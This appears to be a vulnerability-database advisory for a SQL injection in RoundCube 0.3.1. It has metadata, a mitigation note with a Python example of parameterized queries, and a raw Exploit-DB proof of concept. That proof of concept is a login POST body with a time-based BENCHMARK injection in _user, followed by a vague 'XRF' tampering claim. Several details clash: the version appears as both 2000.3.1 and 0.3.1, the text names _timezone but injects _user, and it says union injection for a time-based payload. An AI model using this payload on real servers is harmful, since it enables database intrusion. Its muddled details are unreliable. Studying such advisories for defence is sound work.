Vendor: RoundCube
By: Smith Falcon
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Union Injection)
Product Name: RoundCube
Affected Version From: 2000.3.1
Affected Version To: 2000.3.1
Patch Exists: YES
Related CWE: N/A
CPE: a:roundcube:roundcube:0.3.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2011

RoundCube 0.3.1 SQL injection

RoundCube 0.3.1 is vulnerable to SQL Union Injection. An attacker can exploit this vulnerability by sending a POST request to the index.php page with a malicious payload in the _timezone parameter. The application is also vulnerable to XRF attacks, which can be exploited by changing the _action parameter to anything. Successful tampering leads to compromise of the username.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
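
The mitigation above as an added example (not RoundCube's code and not part of the original advisory): a Python/sqlite3 stand-in that takes the login body from the PoC on this page, applies an allow-list check to _timezone, and looks up _user through a bound parameter. The table, the function names and the accepted _timezone format are assumptions.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Assumption: _timezone is the "_default_" placeholder or a numeric UTC offset.
TIMEZONE_RE = re.compile(r"(_default_|[+-]?\d{1,2}(\.\d{1,2})?)")

def make_db():
    """Constructed in-memory users table (not RoundCube's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT UNIQUE)")
    conn.execute("INSERT INTO users (username) VALUES (?)", ("alice@example.org",))
    return conn

def parse_login(body):
    """Decode a form-encoded login body and validate _timezone before any use."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    tz = fields.get("_timezone", "")
    if not TIMEZONE_RE.fullmatch(tz):
        raise ValueError("rejected _timezone value")
    return fields.get("_user", ""), tz

def unsafe_sql(user):
    """Vulnerable pattern: concatenation lets a quote in `user` end the literal."""
    return "SELECT user_id FROM users WHERE username = '" + user + "'"

def find_user(conn, user):
    """Hardened pattern: `user` is bound as data and never parsed as SQL."""
    row = conn.execute(
        "SELECT user_id FROM users WHERE username = ?", (user,)
    ).fetchone()
    return row[0] if row else None

# Login body from the PoC on this page (password and token shortened).
POC_BODY = ("_pass=x&_url=_task=mail&_timezone=_default_&_token=t&_action=login"
            "&_user=1'+or+BENCHMARK(2500000%2CMD5(1))+or+'1'='1")

if __name__ == "__main__":
    conn = make_db()
    user, tz = parse_login(POC_BODY)
    print(unsafe_sql(user))                      # input has become SQL text
    print(find_user(conn, user))                 # None: just an unknown username
    print(find_user(conn, "alice@example.org"))  # 1
```

With the bound parameter the quoted input is compared as a literal username and matches no row; the concatenated statement shows why the same input changes the query's logic.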

Exploit-DB raw data:

# Exploit Title: RoundCube 0.3.1 SQL injection
# Date: 10/10/2011
# Author: Smith Falcon
# Software Link: http://roundcube.net/download
# Version: 0.3.1
# Tested on: Linux

_timezone=
is vulnerable to SQL Union Injection.

"POST" data in

http://site.com/roundcube/index.php

_pass=FrAmE30.&_url=_task=mail&_timezone=_default_&_token=cd5bf19253710dfd569f09bfab862ab3&_action=login&_user=1'+or+BENCHMARK(2500000%2CMD5(1))+or+'1'='1"


XRF vulnerable [ POC ]

POST variable

changing variable _action=login to "_action=anything" shows you the site is
vulnerable to XRF attacks. When you replay it with HTTP Live headers, you
see a logged in URL which shows the roundcube 0.3.1 is vulnerable to XRF
attacks. Successful tampering will lead to username compromising.

_action=loggedin

Credits - iqZer0